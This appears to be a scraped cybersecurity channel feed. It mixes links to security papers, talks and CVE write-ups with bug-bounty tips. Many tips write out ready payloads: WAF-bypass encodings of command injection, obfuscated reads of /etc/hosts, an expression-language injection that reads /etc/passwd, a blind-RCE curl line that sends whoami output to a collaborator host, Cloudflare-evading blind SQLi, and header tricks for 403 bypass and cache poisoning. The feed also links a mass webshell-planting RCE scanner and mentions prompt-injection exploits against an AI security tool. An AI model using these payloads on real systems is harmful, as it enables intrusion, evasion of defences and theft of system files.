2777
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
#reversing
#MLSecOps
#Cyber_Education
"Reverse Engineering GPT", 2024.
https://github.com/mytechnotalent/RE-GPT
// Drawing inspiration from Andrej Karpathy’s iconic lecture, "Let’s Build GPT: From Scratch, in Code, Spelled Out", this project takes you on an immersive journey into the inner workings of GPT. Step-by-step, we’ll construct a GPT model from the ground up, demystifying its architecture and bringing its mechanics to life through hands-on coding
See also:
Neural Networks: Zero to Hero
#AIOps
#Fuzzing
#Offensive_security
"AI for AppSec and Offensive Security: From Automation to Autonomy", BSides Berlin, 2025.
]-> AI-powered workflow automation and AI Agents for AppSec, Fuzzing & Offensive Security
#AppSec
#Cloud_Security
1⃣ PoC for CVE-2025-49844, CVE-2025-46817 and CVE-2025-46818 Critical Lua Engine Vulnerabilities
https://redrays.io/blog/poc-for-cve-2025-49844-cve-2025-46817-and-cve-2025-46818-critical-lua-engine-vulnerabilities
// Three critical vulnerabilities in Redis 7.4.5
2⃣ Hunting for Bucket Traversals in Google's Client Libraries
https://jdomeracki.github.io/2025/05/04/hunting_for_bucket_traversals
// Bucket traversal to be an underresearched class of vulnerabilities, requiring significant context-specific knowledge for comprehensive understanding
✎ The perils of the “real” client IP & X-Forwarded-For Header
You've probably seen headers like these in common 403-bypass wordlists (e.g., my gist):
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Client-IP: 127.0.0.1
127.0.0.1, localhost, 192.168.1.1, internal IPs, etc.), but have you ever stopped to wonder why they sometimes actually work to bypass IP-based restrictions, rate limits, or 403/401 responses?X-Forwarded-For: 127.0.0.1
127.0.0.1, <real attacker IP>
🛡️ Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
❌ Blocked Payload
(select(0)from(select(sleep(10)))v) → 403 Forbidden
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
Hey Hunter's,
DarkShadow here back again, dropping a really interesting bypass method!
❎WAF block: whoami
✅WAF bypass: $'\x77\x68\x6f\x61\x6d\x69'
✨Bash script:
#!/bin/bash
str="$1"
out=""
for ((i=0; i<${#str}; i++)); do
char="${str:i:1}"
ascii=$(printf '%d' "'$char")
hex=$(printf '%02x' "$ascii")
out="${out}\\x${hex}"
done
echo "$'$out'"
Hey Hunter's,
DarkShadow here back again, dropping some bypass methods that definitely help you.
Trying OS command injection, but WAF blocks every times?
❌ cat /etc/hosts
✅ tac /e\t\c/h\o\s\t\s
✅ tac${IFS}/e\t\c/h\o\s\t\s
✅ tac /e*c/h*st*
✅ tac /e{t,c}*/{o,h}*s*{s,t}
✅ tac /??c/??sts
Let me know guy's you all wants more or not like that?
Hey Hunter’s,
DarkShadow here back again, dropping another easiest way to get critical bugs!
If You Ever See Language Parameter, Then Never Forget to Test Expression-Language Injection Style Payload.
✅POC Payload:
1. Change the Method GET to POST
2. Language={${system("cat+/etc/passwd")}}
CACHE POISONING QUICK WIN:
Most apps validate X-Forwarded-Host as a single value.
But try this:
X-Forwarded-Host: http://legit.com, http://evil.com
• CDN: Reads first → Allows ✅
• App: Reads last → Injects
New bug bounty resource 🚀
The Cache Poisoning Bible - Part 1: Advanced Fundamentals
Everything I wish I knew when I started:
• Cache key architectures
• CDN comparison guide
• Advanced detection methods
• Real-world patterns
Aacle/the-cache-poisoning-bible-part-1-advanced-fundamentals-2c8e9d7be2e9" rel="nofollow">https://medium.com/@Aacle/the-cache-poisoning-bible-part-1-advanced-fundamentals-2c8e9d7be2e9
#DFIR
#AIOps
#MLSecOps
#RAG_Security
AI Incident Response Framework, V1.0
https://github.com/cosai-oasis/ws2-defenders/blob/main/incident-response/AI%20Incident%20Response.md
// This guides defenders on proactively minimizing the impact of AI system exploitation. It details how to maintain auditability, resiliency, and rapid recovery even when a system is compromised by advanced threat actors. Also explores the unique challenges of AI incident response, emphasizing the role of forensic investigation and the complications introduced by agentic architectures, while providing concrete steps to manage this new complexity
#exploit
"Exploiting the Impossible:
A Deep Dive into A Vulnerability Apple Deems Unexploitable", NullCon Berlin 2025.
]-> https://jhftss.github.io/Exploiting-the-Impossible
]-> PoC
// race condition in Apple core file-copy API (CVE-2024-54566, CVE-2025-43220)
#DevOps
#MLSecOps
#Whitepaper
"DoD Artificial Intelligence Cybersecurity Risk Management Tailoring Guide", Ver.2, July 2025.
// This guidance applies to any AI system used or operated by DoD Components and presents tailored guidance for system owners and authorizing officials to use when authorizing an AI system for operational use
#AIOps
#MLSecOps
"Cybersecurity AI: Hacking the AI Hackers via Prompt Injection", Aug. 2025.
]-> Prompt injection mitigation
// We present PoC exploits against the Cybersecurity AI (CAI) framework and its CLI tool, and detail our mitigations against such attacks in a multi-layered defense implementation
https://github.com/DivyanshGoel259/Churn-Prediction
Finally our first ANN project in which we trained a model for "Churn Prediction"
#tools
#NetSec
#Research
"Multi Objective Optimization and AutoML based Intrusion Detection System", Nov. 2025.
]-> Repo
// In work, an innovative IDS utilizing Automated ML and Multi-Objective Optimization is proposed for autonomous and optimized attack detection in modern networking environments. The proposed IDS framework integrates two primary innovative techniques: Optimized Importance and Percentage-based Automated Feature Selection (OIP-AutoFS) and Optimized Performance, Confidence, and Efficiency-based Combined Algorithm Selection and Hyperparameter Optimization (OPCE-CASH)
#AppSec
#Whitepaper
#Threat_Research
"Comparative Analysis of Large Language Model Performance in Automated Threat Modeling: A WordPress Application Case Study", Aug. 2025.
]-> Repo
// This study investigates the use of LLMs as an assistant to conduct threat models of systems or apps. It researches the efficacy of a sample of modern LLMs against a constant system, a WordPress application deployed in Kubernetes. It compares the results based on four key metrics: threat coverage, completeness & depth of explanation, consistency, and false positive rate
#Analytics
#Threat_Research
An analytical review of the main cybersecurity events for the week (November 1-8, 2025)
1⃣ Breaking Down the Balancer v2 Hack
// The Balancer hack in 2025, caused by a longstanding rounding bug, highlights the need for rigorous math correctness, thorough testing, continuous security updates, and layered defenses in DeFi
]-> Analysis and guidance for DeFi ecosystem
2⃣ RDSEED Failure on AMD "Zen 5" Processors
// CVE-2025-62626. The RDSEED function for AMD’s Zen 5 processors does return 0 more often than it should...
3⃣ GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools
// Based on recent analysis of the broader threat landscape, Google Threat Intelligence Group has identified a shift that occurred within the last year: adversaries are no longer leveraging AI just for productivity gains, they are deploying novel AI-enabled malware in active ops
]-> a comprehensive guide to developing AI/ML systems is available on the channel
4⃣ Improvements to Open VSX Security
// In reference to the Glassworm incident, OpenVSX published a blog post outlining some of the security improvements they will make to prevent a repeat of this incident
5⃣ MS Teams Impersonation and Spoofing Vulnerabilities
// four vulnerabilities in MS Teams that allow attackers to impersonate executives, manipulate messages, alter notifications, and forge identities in video/audio calls. Both external guest users and malicious insiders could exploit these flaws
6⃣ The channel's most read publication in October
// Don’t Look Up: There Are Sensitive Internal Links in the Clear on GEO Satellites
]-> Analytical review (Oct.25 - Nov.1, 2025)
Het Hunter's,
DarkShadow here back again!
✅CRLF injection Explain🔥
This vulnerability allow an attacker to add there custom header on the responds! If you can inject \r\n.
⚡️Outdated but Helpful Some MySQL tricks to break some #WAFs out there. ⚔️ by @BRuteLogicSELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
#infosec #cybersec #bugbountytips
🚨Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets.
✅https://github.com/ill-deed/CVE-2025-34085-Multi-target
Hey Hunter’s,
DarkShadow here back again!
☠️Blind Remote Code Execution🔥
✅POC: [Preferred format]
curl -X POST -d \"user=$(whoami)\" http://BURP_LINK"
Others format you might try:
curl whoami.BURP_LINK
curl $(whoami).BURP_LINK
some time targets might vulnerable but not give you the output. so never forget to try your burp collaborator to get the output.
NOTICE: always check User-Agent Header in your burp collaborator responds, if here you got curl means RCE.
Now you hit follow me for more: x.com/darkshadow2bd
Guys, I need ur review... I have created a ai to generate a vibe coding prompt.. And made it open sourced please do check and let me know the review..
https://github.com/Addy-shetty/Vibe-Prompting
Have one question... Do any here learning vibe coding...
Читать полностью…
#DevOps
#Tech_book
"Java Spring Bug Hunter's Secure Coding Playbook:
Java Spring Security with SAST Arsenal from Semgrep to Claude", 2025.
// Java Spring security in 2025 - a high-stakes game where a single misconfigured bean or an overlooked deserialization endpoint can become the gateway for sophisticated attackers...
#tools
#WLAN_Security
"Crowdsourcing Bluetooth identity, to understand Bluetooth vulnerability", DistrictCon 2025.
]-> Repo
]-> BlueTooth Information Data Exchange
]-> Blue2thprinting Code
// Disclaimer
#AppSec
#WebApp_Security
1. Critical UXSS in Opera Browser
renwa/when-ctf-meets-bug-bounty-a-critical-uxss-in-opera-browser-ee16f389e555" rel="nofollow">https://medium.com/@renwa/when-ctf-meets-bug-bounty-a-critical-uxss-in-opera-browser-ee16f389e555
// Leak open tab URLs (flag included)
2. Subverting code integrity checks to locally backdoor Signal, 1Password, Slack, and more
https://blog.trailofbits.com/2025/09/03/subverting-code-integrity-checks-to-locally-backdoor-signal-1password-slack-and-more
// deep dive into Electron CVE-2025-55305
3. RCE though vulnerability in Facebook Messenger for Windows
https://www.vulnano.com/2025/09/remote-code-execution-though.html
// Attacker: Pixel Fold, Android 14. Victim: Windows 11 Home 22H
#Space_Security
#WLAN_Security
"GPS Spoofing Attacks on Automated Frequency Coordination System in Wi-Fi 6E and Beyond", 2025.
// ..we demonstrate that GPS-based location reporting, which Wi-Fi APs use, can be spoofed using inexpensive, off-the-shelf radio equipment. This enables attackers to manipulate AP behavior, gain unauthorized spectrum access, cause harmful interference, or disable APs entirely by spoofing them into foreign locations
See also:
]-> GNSS-WASP: GNSS Wide Area SPoofing (.pdf)
Free Recon Course and Methodology For Bug Bounty Hunters
https://www.youtube.com/watch?v=evyxNUzl-HA
Web Cache Poisoning
small✅ checklist
Read Full Article : Aacle/web-cache-poisoning-part-2-weaponizing-headers-url-discrepancies-bbb7b2c0159a" rel="nofollow">https://medium.com/@Aacle/web-cache-poisoning-part-2-weaponizing-headers-url-discrepancies-bbb7b2c0159a
• Test X-Forwarded-*, X-Host, X-Original-URL, User-Agent for reflection.
• Check Vary and target UA-specific poisoning when relevant.
• Try encoded dot-segments (%2e%2e, %2f, %5c) and observe X-Cache
• Test .css / .js extension flip on sensitive endpoints (CSPT)
• Seed cache via Burp parallel requests (first .js then main HTML)
• Use fresh IPs, low request rate, and record X-Cache, Age, CF-Cache-Status
• Run delimiter discovery (append random suffix → insert delimiter → compare).